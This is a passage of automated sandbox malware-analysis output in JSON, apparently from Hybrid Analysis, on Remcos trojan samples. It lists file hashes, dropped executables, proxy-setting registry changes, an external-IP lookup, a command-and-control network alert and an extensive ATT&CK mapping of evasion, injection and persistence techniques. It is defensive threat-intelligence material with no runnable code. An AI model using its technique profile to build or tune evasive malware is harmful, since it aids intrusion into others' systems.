\"geoplugin.net\"", "origin": "Monitored Target", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYENABLE\"; Value: \"00000000\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYSERVER\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYOVERRIDE\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 2404", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-24", "type": 7, "relevance": 6, "name": "Tries to identify its external IP address", "description": "\"geoplugin.net\"", "origin": "Network Traffic", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "suricata-2", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET JA3 Hash - Remcos 3.x/4.x TLS Connection\" (SID: 2036594, Rev: 1, Severity: 1) categorized as \"Malware Command and Control Activity Detected\"", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0
https://hybrid-analysis.com/sample/8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0
Hybrid Analysis - Remcos
{"size": 10202112, "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "submit_name": "8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0", "sha256": "8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0", "av_detect": 67, "vx_family": "IL:Trojan.MSILZilla", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 2, "total_signatures": 149, "extracted_files": [{"name": "Update.exe", "file_path": "%TEMP%\\QknqBASLBEmK\\Update.exe", "file_size": 4076032, "sha256": "b32ec19df6624ef31e2cada8af6f53a0f3b18be9b3f6e74d3e8262c0800c5f28", "type_tags": ["peexe", "64bits", "executable"], "description": "PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows", "runtime_process": "8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe (PID: 3276)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Deepseed Checker.exe", "file_path": "%TEMP%\\hAifIHNdlq\\Deepseed Checker.exe", "file_size": 5160960, "sha256": "47333f525f5219e9e4048db4b3fb77df1da9bfd803e68f7a7d97e5b82e870e33", "type_tags": ["peexe", "assembly", "executable"], "description": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "Deepseed Checker.exe (PID: 2512)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00003276", "name": "8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe", "normalized_path": "C:\\8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe", "sha256": "8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0"}, {"uid": "00000000-00002512", "parentuid": "00000000-00003276", "name": "Deepseed Checker.exe", "normalized_path": "%TEMP%\\hAifIHNdlq\\Deepseed Checker.exe", "sha256": "21aeda2faa224d0a970fa0f3207fe04803b2562f171ba7729972e23c2c952e50"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 5, "informative_identifiers_count": 10}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Compile After Delivery", "attck_id": "T1027.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/004", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 13}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"set_UseShellExecute\" (Indicator: \"ShellExecute\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n file/memory contains long string with (Indicator: \"ShellExecute\"; File: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found reference to API \"set_UseShellExecute\" (Indicator: \"ShellExecute\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found reference to API \"UseShellExecute = true\" (Indicator: \"ShellExecute\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-615", "type": 2, "relevance": 1, "name": "Can loads assembly that contains the code that is currently executing [Dotnet]", "description": "Found string \"GetExecutingAssembly\" (Indicator: \"GetExecutingAssembly\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")", "origin": "File/Memory", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-423", "type": 2, "relevance": 1, "name": "Contains ability to create directories (API string)", "description": "Found reference to API \"CreateDirectory\" (Indicator: \"CreateDirectory\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")", "origin": "File/Memory", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-315", "type": 2, "relevance": 1, "name": "Contains ability to create/open files (API string)", "description": "Found reference to API \"CreateFileMappingA\" (Indicator: \"CreateFile\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"o enable assembly bind failure logging, set the registry value [HKLM\\Software\\Microsoft\\Fusion!EnableLog] (DWORD) to 1.\" in Source: 00000000-00002512.00000000.89952.00470000.00000004.mdmp\n 00000000-00002512.00000001.90116.00470000.00000004.mdmp\n \"o turn this feature off, remove the registry value [HKLM\\Software\\Microsoft\\Fusion!EnableLog].\" in Source: 00000000-00002512.00000000.89952.00470000.00000004.mdmp\n 00000000-00002512.00000001.90116.00470000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hAifIHNdlq\\Deepseed Checker.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"GetTempPath\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"MessageBox\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"CreateDirectory\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"GetObject\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"GetLastError\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"HeapFree\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"EnterCriticalSection\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"InitOnceComplete\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"HeapAlloc\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"TlsAlloc\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"VirtualProtect\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"LoadLibraryA\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"DeleteCriticalSection\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"Module32FirstW\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"GetCurrentDirectoryW\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"GetConsoleMode\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"RtlVirtualUnwind\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"GetFileInformationByHandle\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"GetProcessHeap\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"MapViewOfFile\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"TlsFree\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"Module32NextW\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: 